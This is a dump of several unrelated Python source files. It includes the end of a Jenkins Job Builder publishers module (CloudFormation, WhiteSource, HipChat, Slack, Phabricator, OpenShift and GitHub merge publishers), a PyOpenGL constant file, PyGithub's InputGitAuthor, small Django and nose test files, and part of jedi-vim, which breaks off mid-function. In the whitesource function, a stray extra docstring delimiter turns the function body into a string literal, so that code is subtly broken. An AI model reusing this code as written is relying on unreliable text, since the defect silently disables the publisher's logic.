* **eu-west-1**
* **ap-southeast-1**
* **ap-southeast-2**
* **ap-northeast-1**
* **sa-east-1**
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cloudformation.yaml
:language: yaml
"""
region_dict = helpers.cloudformation_region_dict()
stacks = helpers.cloudformation_init(
xml_parent, data, 'CloudFormationPostBuildNotifier')
for stack in data.get('create-stacks', []):
helpers.cloudformation_stack(xml_parent, stack, 'PostBuildStackBean',
stacks, region_dict)
delete_stacks = helpers.cloudformation_init(
xml_parent, data, 'CloudFormationNotifier')
for delete_stack in data.get('delete-stacks', []):
helpers.cloudformation_stack(xml_parent, delete_stack,
'SimpleStackBean', delete_stacks,
region_dict)
def whitesource(parser, xml_parent, data):
"""yaml: whitesource
This plugin brings automatic open source management to Jenkins users.
Requires the Jenkins :jenkins-wiki:`Whitesource Plugin
<Whitesource+Plugin>`.
:arg str product-token: Product name or token to update (default '')
:arg str version: Product version (default '')
:arg str override-token: Override the api token from the global config
(default '')
:arg str project-token: Token uniquely identifying the project to update
(default '')
:arg list includes: list of libraries to include (default '[]')
:arg list excludes: list of libraries to exclude (default '[]')
:arg str policies: Whether to override the global settings. Valid values:
global, enable, disable (default 'global')
:arg str requester-email: Email of the WhiteSource user that requests to
update WhiteSource (>=1.5.1) (default '')
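    An illustrative sketch (tokens and patterns are placeholders); the tested
    examples are linked below:

    .. code-block:: yaml

        publishers:
          - whitesource:
              # illustrative placeholder values only
              product-token: my-product
              version: '1.0'
              policies: enable
              includes:
                - '*.jar'
              excludes:
                - '*-sources.jar'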
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/whitesource-full.yaml
:language: yaml
Minimal Example:
.. literalinclude::
/../../tests/publishers/fixtures/whitesource-minimal.yaml
       :language: yaml
    """
"""
whitesource = XML.SubElement(xml_parent, 'org.whitesource.jenkins.'
'WhiteSourcePublisher')
whitesource.set('plugin', 'whitesource')
policies = ['global', 'enable', 'disable']
mappings = [
('policies', 'jobCheckPolicies', 'global', policies),
('override-token', 'jobApiToken', ''),
('product-token', 'product', ''),
('version', 'productVersion', ''),
('project-token', 'projectToken', ''),
('requester-email', 'requesterEmail', ''),
]
helpers.convert_mapping_to_xml(
whitesource, data, mappings, fail_required=True)
XML.SubElement(whitesource, 'libIncludes').text = ' '.join(
data.get('includes', []))
XML.SubElement(whitesource, 'libExcludes').text = ' '.join(
data.get('excludes', []))
XML.SubElement(whitesource, 'ignorePomModules').text = 'false'
def hipchat(parser, xml_parent, data):
"""yaml: hipchat
Publisher that sends hipchat notifications on job events
Requires the Jenkins :jenkins-wiki:`Hipchat Plugin
<Hipchat+Plugin>` version >=1.9
    Please see the documentation for older plugin versions:
http://docs.openstack.org/infra/jenkins-job-builder/hipchat.html
:arg str token: This will override the default auth token (optional)
:arg list rooms: list of HipChat rooms to post messages to, overrides
global default (optional)
:arg bool notify-start: post messages about build start event
(default false)
:arg bool notify-success: post messages about successful build event
(default false)
:arg bool notify-aborted: post messages about aborted build event
(default false)
:arg bool notify-not-built: post messages about build set to NOT_BUILT.
This status code is used in a multi-stage build where a problem in
earlier stage prevented later stages from building. (default false)
:arg bool notify-unstable: post messages about unstable build event
(default false)
:arg bool notify-failure: post messages about build failure event
(default false)
:arg bool notify-back-to-normal: post messages about build being back to
normal after being unstable or failed (default false)
:arg str start-message: This will override the default start message
(optional)
:arg str complete-message: This will override the default complete message
(optional)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/hipchat001.yaml
:language: yaml
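    An illustrative sketch (token and room name are placeholders):

    .. code-block:: yaml

        publishers:
          - hipchat:
              # illustrative placeholder values only
              token: 0123456789abcdef
              rooms:
                - Build Notifications
              notify-start: true
              notify-failure: true
              notify-back-to-normal: true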
"""
hipchat = XML.SubElement(
xml_parent,
'jenkins.plugins.hipchat.HipChatNotifier')
XML.SubElement(hipchat, 'token').text = str(
data.get('token', ''))
if 'rooms' in data:
XML.SubElement(hipchat, 'room').text = str(
",".join(data['rooms']))
XML.SubElement(hipchat, 'startNotification').text = str(
data.get('notify-start', False)).lower()
XML.SubElement(hipchat, 'notifySuccess').text = str(
data.get('notify-success', False)).lower()
XML.SubElement(hipchat, 'notifyAborted').text = str(
data.get('notify-aborted', False)).lower()
XML.SubElement(hipchat, 'notifyNotBuilt').text = str(
data.get('notify-not-built', False)).lower()
XML.SubElement(hipchat, 'notifyUnstable').text = str(
data.get('notify-unstable', False)).lower()
XML.SubElement(hipchat, 'notifyFailure').text = str(
data.get('notify-failure', False)).lower()
XML.SubElement(hipchat, 'notifyBackToNormal').text = str(
data.get('notify-back-to-normal', False)).lower()
# optional settings, so only add XML in if set.
if 'start-message' in data:
XML.SubElement(hipchat, 'startJobMessage').text = str(
data['start-message'])
if 'complete-message' in data:
XML.SubElement(hipchat, 'completeJobMessage').text = str(
data['complete-message'])
def slack(parser, xml_parent, data):
"""yaml: slack
Publisher that sends slack notifications on job events.
Requires the Jenkins :jenkins-wiki:`Slack Plugin <Slack+Plugin>`
    When using Slack Plugin version < 2.0, the plugin itself requires a
    publisher as well as properties; please note that you have to create
    those too. When using Slack Plugin version >= 2.0, you should only
    configure the publisher.
:arg str team-domain: Your team's domain at slack. (default '')
:arg str auth-token: The integration token to be used when sending
notifications. (default '')
:arg str build-server-url: Specify the URL for your server installation.
(default '/')
    :arg str room: A comma separated list of rooms / channels to post the
notifications to. (default '')
:arg bool notify-start: Send notification when the job starts (>=2.0).
(default false)
:arg bool notify-success: Send notification on success (>=2.0).
(default false)
:arg bool notify-aborted: Send notification when job is aborted (>=2.0).
(default false)
:arg bool notify-not-built: Send notification when job set to NOT_BUILT
status (>=2.0). (default false)
:arg bool notify-unstable: Send notification when job becomes unstable
(>=2.0). (default false)
:arg bool notify-failure: Send notification when job fails for the first
time (previous build was a success) (>=2.0). (default false)
    :arg bool notify-back-to-normal: Send notification when job is succeeding
again after being unstable or failed (>=2.0). (default false)
:arg bool notify-repeated-failure: Send notification when job fails
successively (previous build was also a failure) (>=2.0).
(default false)
:arg bool include-test-summary: Include the test summary (>=2.0).
(default false)
:arg str commit-info-choice: What commit information to include into
notification message, "NONE" includes nothing about commits, "AUTHORS"
includes commit list with authors only, and "AUTHORS_AND_TITLES"
includes commit list with authors and titles (>=2.0). (default "NONE")
:arg bool include-custom-message: Include a custom message into the
notification (>=2.0). (default false)
:arg str custom-message: Custom message to be included (>=2.0).
(default '')
Example (version < 2.0):
.. literalinclude::
/../../tests/publishers/fixtures/slack001.yaml
:language: yaml
Minimal example (version >= 2.0):
.. literalinclude::
/../../tests/publishers/fixtures/slack003.yaml
:language: yaml
Full example (version >= 2.0):
.. literalinclude::
/../../tests/publishers/fixtures/slack004.yaml
:language: yaml
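    An illustrative sketch for plugin version >= 2.0 (domain, token and
    channel are placeholders):

    .. code-block:: yaml

        publishers:
          - slack:
              # illustrative placeholder values only
              team-domain: example
              auth-token: secret-token
              room: '#ci'
              notify-failure: true
              notify-back-to-normal: true
              include-custom-message: true
              custom-message: 'Build ${BUILD_URL}'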
"""
def _add_xml(elem, name, value=''):
if isinstance(value, bool):
value = str(value).lower()
XML.SubElement(elem, name).text = value
logger = logging.getLogger(__name__)
plugin_info = parser.registry.get_plugin_info('Slack Notification Plugin')
plugin_ver = pkg_resources.parse_version(plugin_info.get('version', "0"))
mapping = (
('team-domain', 'teamDomain', ''),
('auth-token', 'authToken', ''),
('build-server-url', 'buildServerUrl', '/'),
('room', 'room', ''),
)
mapping_20 = (
('notify-start', 'startNotification', False),
('notify-success', 'notifySuccess', False),
('notify-aborted', 'notifyAborted', False),
('notify-not-built', 'notifyNotBuilt', False),
('notify-unstable', 'notifyUnstable', False),
('notify-failure', 'notifyFailure', False),
('notify-back-to-normal', 'notifyBackToNormal', False),
('notify-repeated-failure', 'notifyRepeatedFailure', False),
('include-test-summary', 'includeTestSummary', False),
('commit-info-choice', 'commitInfoChoice', 'NONE'),
('include-custom-message', 'includeCustomMessage', False),
('custom-message', 'customMessage', ''),
)
commit_info_choices = ['NONE', 'AUTHORS', 'AUTHORS_AND_TITLES']
slack = XML.SubElement(
xml_parent,
'jenkins.plugins.slack.SlackNotifier',
)
if plugin_ver >= pkg_resources.parse_version("2.0"):
mapping = mapping + mapping_20
if plugin_ver < pkg_resources.parse_version("2.0"):
for yaml_name, _, default_value in mapping:
# All arguments that don't have a default value are mandatory for
# the plugin to work as intended.
if not data.get(yaml_name, default_value):
raise MissingAttributeError(yaml_name)
for yaml_name, _, _ in mapping_20:
if yaml_name in data:
logger.warn(
"'%s' is invalid with plugin version < 2.0, ignored",
yaml_name,
)
for yaml_name, xml_name, default_value in mapping:
value = data.get(yaml_name, default_value)
# 'commit-info-choice' is enumerated type
if yaml_name == 'commit-info-choice':
if value not in commit_info_choices:
raise InvalidAttributeError(
yaml_name, value, commit_info_choices,
)
# Ensure that custom-message is set when include-custom-message is set
# to true.
        if yaml_name == 'include-custom-message' and value:
if not data.get('custom-message', ''):
raise MissingAttributeError('custom-message')
_add_xml(slack, xml_name, value)
def phabricator(parser, xml_parent, data):
"""yaml: phabricator
Integrate with `Phabricator <http://phabricator.org/>`_
Requires the Jenkins :jenkins-wiki:`Phabricator Plugin
<Phabricator+Differential+Plugin>`.
:arg bool comment-on-success: Post a *comment* when the build
succeeds. (optional)
:arg bool uberalls-enabled: Integrate with uberalls. (optional)
:arg str comment-file: Include contents of given file if
commenting is enabled. (optional)
:arg int comment-size: Maximum comment character length. (optional)
:arg bool comment-with-console-link-on-failure: Post a *comment*
when the build fails. (optional)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/phabricator001.yaml
:language: yaml
"""
root = XML.SubElement(xml_parent,
'com.uber.jenkins.phabricator.PhabricatorNotifier')
if 'comment-on-success' in data:
XML.SubElement(root, 'commentOnSuccess').text = str(
data.get('comment-on-success')).lower()
if 'uberalls-enabled' in data:
XML.SubElement(root, 'uberallsEnabled').text = str(
data.get('uberalls-enabled')).lower()
if 'comment-file' in data:
XML.SubElement(root, 'commentFile').text = data.get('comment-file')
if 'comment-size' in data:
XML.SubElement(root, 'commentSize').text = str(
data.get('comment-size'))
if 'comment-with-console-link-on-failure' in data:
XML.SubElement(root, 'commentWithConsoleLinkOnFailure').text = str(
data.get('comment-with-console-link-on-failure')).lower()
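# Illustrative sketch (assumed input, not taken from the fixtures): given
#   data = {'comment-on-success': True, 'comment-size': 1000}
# the function above emits only <commentOnSuccess>true</commentOnSuccess> and
# <commentSize>1000</commentSize>; options absent from the YAML produce no element,
# leaving the plugin's own defaults in effect.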
def openshift_build_canceller(parser, xml_parent, data):
"""yaml: openshift-build-canceller
This action is intended to provide cleanup for a Jenkins job which failed
because a build is hung (instead of terminating with a failure code);
    this step will allow you to perform the equivalent of an `oc cancel-build`
for the provided build config; any builds under that build config which
are not previously terminated (either successfully or unsuccessfully)
or cancelled will be cancelled.
Requires the Jenkins :jenkins-wiki:`OpenShift
Pipeline Plugin <OpenShift+Pipeline+Plugin>`.
:arg str api-url: this would be the value you specify if you leverage the
--server option on the OpenShift `oc` command.
(default '\https://openshift.default.svc.cluster.local')
:arg str bld-cfg: The value here should be whatever was the output
        from `oc project` when you created the BuildConfig you
want to run a Build on (default 'frontend')
:arg str namespace: If you run `oc get bc` for the project listed in
"namespace", that is the value you want to put here. (default 'test')
:arg str auth-token: The value here is what you supply with the --token
option when invoking the OpenShift `oc` command. (default '')
:arg bool verbose: This flag is the toggle for
turning on or off detailed logging in this plug-in. (default false)
Full Example:
.. literalinclude::
../../tests/publishers/fixtures/openshift-build-canceller001.yaml
:language: yaml
Minimal Example:
.. literalinclude::
../../tests/publishers/fixtures/openshift-build-canceller002.yaml
:language: yaml
"""
osb = XML.SubElement(xml_parent,
'com.openshift.jenkins.plugins.pipeline.'
'OpenShiftBuildCanceller')
mapping = [
# option, xml name, default value
("api-url", 'apiURL', 'https://openshift.default.svc.cluster.local'),
("bld-cfg", 'bldCfg', 'frontend'),
("namespace", 'namespace', 'test'),
("auth-token", 'authToken', ''),
("verbose", 'verbose', False),
]
helpers.convert_mapping_to_xml(osb, data, mapping, fail_required=True)
def openshift_deploy_canceller(parser, xml_parent, data):
"""yaml: openshift-deploy-canceller
This action is intended to provide cleanup for any OpenShift deployments
left running when the Job completes; this step will allow you to perform
    the equivalent of an `oc deploy --cancel` for the provided deployment config.
Requires the Jenkins :jenkins-wiki:`OpenShift
Pipeline Plugin <OpenShift+Pipeline+Plugin>`.
:arg str api-url: this would be the value you specify if you leverage the
--server option on the OpenShift `oc` command.
(default '\https://openshift.default.svc.cluster.local')
:arg str dep-cfg: The value here should be whatever was the output
        from `oc project` when you created the DeploymentConfig whose
        deployments you want to cancel (default 'frontend')
:arg str namespace: If you run `oc get bc` for the project listed in
"namespace", that is the value you want to put here. (default 'test')
:arg str auth-token: The value here is what you supply with the --token
option when invoking the OpenShift `oc` command. (default '')
:arg bool verbose: This flag is the toggle for
turning on or off detailed logging in this plug-in. (default false)
Full Example:
.. literalinclude::
../../tests/publishers/fixtures/openshift-deploy-canceller001.yaml
:language: yaml
Minimal Example:
.. literalinclude::
../../tests/publishers/fixtures/openshift-deploy-canceller002.yaml
:language: yaml
"""
osb = XML.SubElement(xml_parent,
'com.openshift.jenkins.plugins.pipeline.'
'OpenShiftDeployCanceller')
mapping = [
# option, xml name, default value
("api-url", 'apiURL', 'https://openshift.default.svc.cluster.local'),
("dep-cfg", 'depCfg', 'frontend'),
("namespace", 'namespace', 'test'),
("auth-token", 'authToken', ''),
("verbose", 'verbose', False),
]
helpers.convert_mapping_to_xml(osb, data, mapping, fail_required=True)
def github_pull_request_merge(parser, xml_parent, data):
"""yaml: github-pull-request-merge
This action merges the pull request that triggered the build (see the
github pull request trigger)
Requires the Jenkins :jenkins-wiki:`GitHub pull request builder plugin
<GitHub+pull+request+builder+plugin>`.
    :arg bool only-admins-merge: if `true` only administrators can merge the
        pull request (default false)
    :arg bool disallow-own-code: if `true` you cannot trigger the merge of
        your own pull request; someone else has to trigger the merge.
        (default false)
:arg str merge-comment: Comment to set on the merge commit (default '')
:arg bool fail-on-non-merge: fail the job if the merge was unsuccessful
(default false)
:arg bool delete-on-merge: Delete the branch of the pull request on
successful merge (default false)
Full Example:
.. literalinclude::
../../tests/publishers/fixtures/github-pull-request-merge001.yaml
:language: yaml
Minimal Example:
.. literalinclude::
../../tests/publishers/fixtures/github-pull-request-merge002.yaml
:language: yaml
"""
osb = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.ghprb.GhprbPullRequestMerge')
mapping = [
# option, xml name, default value
("only-admins-merge", 'onlyAdminsMerge', 'false'),
("disallow-own-code", 'disallowOwnCode', 'false'),
("merge-comment", 'mergeComment', ''),
("fail-on-non-merge", 'failOnNonMerge', 'false'),
("delete-on-merge", 'deleteOnMerge', 'false'),
]
helpers.convert_mapping_to_xml(osb, data, mapping, fail_required=True)
class Publishers(jenkins_jobs.modules.base.Base):
sequence = 70
component_type = 'publisher'
component_list_type = 'publishers'
def gen_xml(self, parser, xml_parent, data):
publishers = XML.SubElement(xml_parent, 'publishers')
for action in data.get('publishers', []):
self.registry.dispatch('publisher', parser, publishers, action)
|
mwmuni/LIGGGHTS_GUI
|
refs/heads/master
|
OpenGL/raw/GLX/EXT/framebuffer_sRGB.py
|
8
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLX import _types as _cs
# End users want this...
from OpenGL.raw.GLX._types import *
from OpenGL.raw.GLX import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLX_EXT_framebuffer_sRGB'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLX,'GLX_EXT_framebuffer_sRGB',error_checker=_errors._error_checker)
GLX_FRAMEBUFFER_SRGB_CAPABLE_EXT=_C('GLX_FRAMEBUFFER_SRGB_CAPABLE_EXT',0x20B2)
|
sharkykh/SickRage
|
refs/heads/develop
|
lib/github/InputGitAuthor.py
|
10
|
# -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <[email protected]> #
# Copyright 2012 Zearin <[email protected]> #
# Copyright 2013 Vincent Jacques <[email protected]> #
# #
# This file is part of PyGithub. #
# http://pygithub.github.io/PyGithub/v1/index.html #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
class InputGitAuthor(object):
"""
"""
def __init__(self, name, email, date=github.GithubObject.NotSet):
"""
:param name: string
:param email: string
:param date: string
"""
assert isinstance(name, (str, unicode)), name
assert isinstance(email, (str, unicode)), email
assert date is github.GithubObject.NotSet or isinstance(date, (str, unicode)), date # @todo Datetime?
self.__name = name
self.__email = email
self.__date = date
def __repr__(self):
return 'InputGitAuthor(name="{}")'.format(self.__name)
@property
def _identity(self):
identity = {
"name": self.__name,
"email": self.__email,
}
if self.__date is not github.GithubObject.NotSet:
identity["date"] = self.__date
return identity
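# Illustrative usage (editorial note, not part of PyGithub): an instance serializes
# itself for the git data API through the private ``_identity`` property, e.g.
#   InputGitAuthor("Vincent", "vincent@example.com", "2013-01-01T00:00:00Z")._identity
# evaluates to {"name": "Vincent", "email": "vincent@example.com",
# "date": "2013-01-01T00:00:00Z"}; omitting ``date`` leaves that key out entirely.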
|
henryfjordan/django
|
refs/heads/master
|
tests/template_backends/apps/good/templatetags/good_tags.py
|
1426
|
from django.template import Library
register = Library()
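# Editorial note (not part of the Django test fixture): the template engine only needs
# this module to expose a ``register = Library()`` attribute in order to discover it;
# real tag libraries would then add tags to it, for example:
#   @register.simple_tag
#   def hello():
#       return "hello"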
|
zhmocean/mongo-web-shell
|
refs/heads/master
|
run_tests.py
|
4
|
# Copyright 2013 10gen Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nose
if __name__ == '__main__':
result = nose.runmodule(name='tests', argv=[
'', '-s', '--verbose', '--logging-level=INFO', '--rednose', ])
|
chrber/dcache-docker
|
refs/heads/master
|
dcache/deps/.vim/bundle/jedi-vim/jedi_vim.py
|
5
|
"""
The Python parts of the Jedi library for VIM. It is mostly about communicating
with VIM.
"""
import traceback # for exception output
import re
import os
import sys
from shlex import split as shsplit
try:
from itertools import zip_longest
except ImportError:
from itertools import izip_longest as zip_longest # Python 2
is_py3 = sys.version_info[0] >= 3
if is_py3:
unicode = str
class PythonToVimStr(unicode):
""" Vim has a different string implementation of single quotes """
__slots__ = []
def __new__(cls, obj, encoding='UTF-8'):
if is_py3 or isinstance(obj, unicode):
return unicode.__new__(cls, obj)
else:
return unicode.__new__(cls, obj, encoding)
def __repr__(self):
# this is totally stupid and makes no sense but vim/python unicode
# support is pretty bad. don't ask how I came up with this... It just
# works...
# It seems to be related to that bug: http://bugs.python.org/issue5876
if unicode is str:
s = self
else:
s = self.encode('UTF-8')
return '"%s"' % s.replace('\\', '\\\\').replace('"', r'\"')
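    # Editorial example (not in upstream jedi-vim): the escaping above means
    #   repr(PythonToVimStr('say "hi"'))  ->  '"say \\"hi\\""'
    # so the value can be spliced directly into a Vim expression as a
    # double-quoted string.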
class VimError(Exception):
def __init__(self, message, throwpoint, executing):
super(type(self), self).__init__(message)
self.message = message
self.throwpoint = throwpoint
self.executing = executing
def __str__(self):
return self.message + '; created by: ' + repr(self.executing)
def _catch_exception(string, is_eval):
"""
Interface between vim and python calls back to it.
Necessary, because the exact error message is not given by `vim.error`.
"""
e = 'jedi#_vim_exceptions(%s, %s)'
result = vim.eval(e % (repr(PythonToVimStr(string, 'UTF-8')), is_eval))
if 'exception' in result:
raise VimError(result['exception'], result['throwpoint'], string)
return result['result']
def vim_command(string):
_catch_exception(string, 0)
def vim_eval(string):
return _catch_exception(string, 1)
def no_jedi_warning(error=None):
msg = "Please install Jedi if you want to use jedi-vim."
if error:
msg = '{} The error was: {}'.format(msg, error)
    vim.command('echohl WarningMsg'
                '| echom "{}"'
                '| echohl None'.format(msg.replace('"', '\\"')))
def echo_highlight(msg):
vim_command('echohl WarningMsg | echom "{}" | echohl None'.format(
msg.replace('"', '\\"')))
import vim
try:
import jedi
except ImportError as e:
no_jedi_warning(str(e))
jedi = None
else:
try:
version = jedi.__version__
except Exception as e: # e.g. AttributeError
echo_highlight("Could not load jedi python module: {}".format(e))
jedi = None
else:
if isinstance(version, str):
# the normal use case, now.
from jedi import utils
version = utils.version_info()
if version < (0, 7):
echo_highlight('Please update your Jedi version, it is too old.')
def catch_and_print_exceptions(func):
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except (Exception, vim.error):
print(traceback.format_exc())
return None
return wrapper
def _check_jedi_availability(show_error=False):
def func_receiver(func):
def wrapper(*args, **kwargs):
if jedi is None:
if show_error:
no_jedi_warning()
return
else:
return func(*args, **kwargs)
return wrapper
return func_receiver
@catch_and_print_exceptions
def get_script(source=None, column=None):
jedi.settings.additional_dynamic_modules = \
[b.name for b in vim.buffers if b.name is not None and b.name.endswith('.py')]
if source is None:
source = '\n'.join(vim.current.buffer)
row = vim.current.window.cursor[0]
if column is None:
column = vim.current.window.cursor[1]
buf_path = vim.current.buffer.name
encoding = vim_eval('&encoding') or 'latin1'
return jedi.Script(source, row, column, buf_path, encoding)
@_check_jedi_availability(show_error=False)
@catch_and_print_exceptions
def completions():
row, column = vim.current.window.cursor
# Clear call signatures in the buffer so they aren't seen by the completer.
# Call signatures in the command line can stay.
if vim_eval("g:jedi#show_call_signatures") == '1':
clear_call_signatures()
if vim.eval('a:findstart') == '1':
count = 0
for char in reversed(vim.current.line[:column]):
if not re.match('[\w\d]', char):
break
count += 1
vim.command('return %i' % (column - count))
else:
base = vim.eval('a:base')
source = ''
for i, line in enumerate(vim.current.buffer):
# enter this path again, otherwise source would be incomplete
if i == row - 1:
source += line[:column] + base + line[column:]
else:
source += line
source += '\n'
# here again hacks, because jedi has a different interface than vim
column += len(base)
try:
script = get_script(source=source, column=column)
completions = script.completions()
signatures = script.call_signatures()
out = []
for c in completions:
d = dict(word=PythonToVimStr(c.name[:len(base)] + c.complete),
abbr=PythonToVimStr(c.name),
# stuff directly behind the completion
menu=PythonToVimStr(c.description),
info=PythonToVimStr(c.docstring()), # docstr
icase=1, # case insensitive
dup=1 # allow duplicates (maybe later remove this)
)
out.append(d)
strout = str(out)
except Exception:
# print to stdout, will be in :messages
print(traceback.format_exc())
strout = ''
completions = []
signatures = []
show_call_signatures(signatures)
vim.command('return ' + strout)
@_check_jedi_availability(show_error=True)
@catch_and_print_exceptions
def goto(mode="goto", no_output=False):
"""
:param str mode: "related_name", "definition", "assignment", "auto"
:return: list of definitions/assignments
:rtype: list
"""
script = get_script()
try:
if mode == "goto":
definitions = [x for x in script.goto_definitions()
if not x.in_builtin_module()]
if not definitions:
definitions = script.goto_assignments()
elif mode == "related_name":
definitions = script.usages()
elif mode == "definition":
definitions = script.goto_definitions()
elif mode == "assignment":
definitions = script.goto_assignments()
except jedi.NotFoundError:
echo_highlight("Cannot follow nothing. Put your cursor on a valid name.")
definitions = []
else:
if no_output:
return definitions
if not definitions:
echo_highlight("Couldn't find any definitions for this.")
elif len(definitions) == 1 and mode != "related_name":
# just add some mark to add the current position to the jumplist.
# this is ugly, because it overrides the mark for '`', so if anyone
# has a better idea, let me know.
vim_command('normal! m`')
d = list(definitions)[0]
if d.in_builtin_module():
if d.is_keyword:
echo_highlight("Cannot get the definition of Python keywords.")
else:
echo_highlight("Builtin modules cannot be displayed (%s)."
% d.desc_with_module)
else:
if d.module_path != vim.current.buffer.name:
result = new_buffer(d.module_path)
if not result:
return []
vim.current.window.cursor = d.line, d.column
else:
# multiple solutions
lst = []
for d in definitions:
if d.in_builtin_module():
lst.append(dict(text=PythonToVimStr('Builtin ' + d.description)))
else:
lst.append(dict(filename=PythonToVimStr(d.module_path),
lnum=d.line, col=d.column + 1,
text=PythonToVimStr(d.description)))
vim_eval('setqflist(%s)' % repr(lst))
vim_eval('jedi#add_goto_window(' + str(len(lst)) + ')')
return definitions
@_check_jedi_availability(show_error=True)
@catch_and_print_exceptions
def show_documentation():
script = get_script()
try:
definitions = script.goto_definitions()
except jedi.NotFoundError:
definitions = []
except Exception:
# print to stdout, will be in :messages
definitions = []
print("Exception, this shouldn't happen.")
print(traceback.format_exc())
if not definitions:
echo_highlight('No documentation found for that.')
vim.command('return')
else:
docs = ['Docstring for %s\n%s\n%s' % (d.desc_with_module, '=' * 40, d.docstring())
if d.docstring() else '|No Docstring for %s|' % d for d in definitions]
text = ('\n' + '-' * 79 + '\n').join(docs)
vim.command('let l:doc = %s' % repr(PythonToVimStr(text)))
vim.command('let l:doc_lines = %s' % len(text.split('\n')))
return True
@catch_and_print_exceptions
def clear_call_signatures():
# Check if using command line call signatures
if vim_eval("g:jedi#show_call_signatures") == '2':
vim_command('echo ""')
return
cursor = vim.current.window.cursor
e = vim_eval('g:jedi#call_signature_escape')
# We need two turns here to search and replace certain lines:
# 1. Search for a line with a call signature and save the appended
# characters
# 2. Actually replace the line and redo the status quo.
py_regex = r'%sjedi=([0-9]+), (.*?)%s.*?%sjedi%s'.replace('%s', e)
for i, line in enumerate(vim.current.buffer):
match = re.search(py_regex, line)
if match is not None:
# Some signs were added to minimize syntax changes due to call
# signatures. We have to remove them again. The number of them is
# specified in `match.group(1)`.
after = line[match.end() + int(match.group(1)):]
line = line[:match.start()] + match.group(2) + after
vim.current.buffer[i] = line
vim.current.window.cursor = cursor
@_check_jedi_availability(show_error=False)
@catch_and_print_exceptions
def show_call_signatures(signatures=()):
if vim_eval("has('conceal') && g:jedi#show_call_signatures") == '0':
return
if signatures == ():
signatures = get_script().call_signatures()
clear_call_signatures()
if not signatures:
return
if vim_eval("g:jedi#show_call_signatures") == '2':
return cmdline_call_signatures(signatures)
for i, signature in enumerate(signatures):
line, column = signature.bracket_start
# signatures are listed above each other
line_to_replace = line - i - 1
# because there's a space before the bracket
insert_column = column - 1
if insert_column < 0 or line_to_replace <= 0:
# Edge cases, when the call signature has no space on the screen.
break
# TODO check if completion menu is above or below
line = vim_eval("getline(%s)" % line_to_replace)
params = [p.description.replace('\n', '') for p in signature.params]
try:
# *_*PLACEHOLDER*_* makes something fat. See after/syntax file.
params[signature.index] = '*_*%s*_*' % params[signature.index]
except (IndexError, TypeError):
pass
# This stuff is reaaaaally a hack! I cannot stress enough, that
# this is a stupid solution. But there is really no other yet.
# There is no possibility in VIM to draw on the screen, but there
# will be one (see :help todo Patch to access screen under Python.
# (Marko Mahni, 2010 Jul 18))
text = " (%s) " % ', '.join(params)
text = ' ' * (insert_column - len(line)) + text
end_column = insert_column + len(text) - 2 # -2 due to bold symbols
        # Need to decode it with utf8, because vim always returns a Python 2
        # string even if it is unicode.
e = vim_eval('g:jedi#call_signature_escape')
if hasattr(e, 'decode'):
e = e.decode('UTF-8')
# replace line before with cursor
regex = "xjedi=%sx%sxjedix".replace('x', e)
prefix, replace = line[:insert_column], line[insert_column:end_column]
# Check the replace stuff for strings, to append them
# (don't want to break the syntax)
regex_quotes = r'''\\*["']+'''
# `add` are all the quotation marks.
# join them with a space to avoid producing '''
add = ' '.join(re.findall(regex_quotes, replace))
# search backwards
if add and replace[0] in ['"', "'"]:
a = re.search(regex_quotes + '$', prefix)
add = ('' if a is None else a.group(0)) + add
tup = '%s, %s' % (len(add), replace)
repl = prefix + (regex % (tup, text)) + add + line[end_column:]
vim_eval('setline(%s, %s)' % (line_to_replace, repr(PythonToVimStr(repl))))
@catch_and_print_exceptions
def cmdline_call_signatures(signatures):
def get_params(s):
return [p.description.replace('\n', '') for p in s.params]
if len(signatures) > 1:
params = zip_longest(*map(get_params, signatures), fillvalue='_')
params = ['(' + ', '.join(p) + ')' for p in params]
else:
params = get_params(signatures[0])
text = ', '.join(params).replace('"', '\\"').replace(r'\n', r'\\n')
# Allow 12 characters for ruler/showcmd - setting noruler/noshowcmd
# here causes incorrect undo history
max_msg_len = int(vim_eval('&columns')) - 12
max_num_spaces = (max_msg_len - len(signatures[0].call_name)
- len(text) - 2) # 2 accounts for parentheses
if max_num_spaces < 0:
return # No room for the message
_, column = signatures[0].bracket_start
num_spaces = min(int(vim_eval('g:jedi#first_col +'
'wincol() - col(".")')) +
column - len(signatures[0].call_name),
max_num_spaces)
spaces = ' ' * num_spaces
try:
index = [s.index for s in signatures if isinstance(s.index, int)][0]
escaped_param = params[index].replace(r'\n', r'\\n')
left = text.index(escaped_param)
right = left + len(escaped_param)
vim_command(' echon "%s" | '
'echohl Function | echon "%s" | '
'echohl None | echon "(" | '
'echohl jediFunction | echon "%s" | '
'echohl jediFat | echon "%s" | '
'echohl jediFunction | echon "%s" | '
'echohl None | echon ")"'
% (spaces, signatures[0].call_name, text[:left],
text[left:right], text[right:]))
except (TypeError, IndexError):
vim_command(' echon "%s" | '
'echohl Function | echon "%s" | '
'echohl None | echon "(" | '
'echohl jediFunction | echon "%s" | '
'echohl None | echon ")"'
% (spaces, signatures[0].call_name, text))
@_check_jedi_availability(show_error=True)
@catch_and_print_exceptions
def rename():
if not int(vim.eval('a:0')):
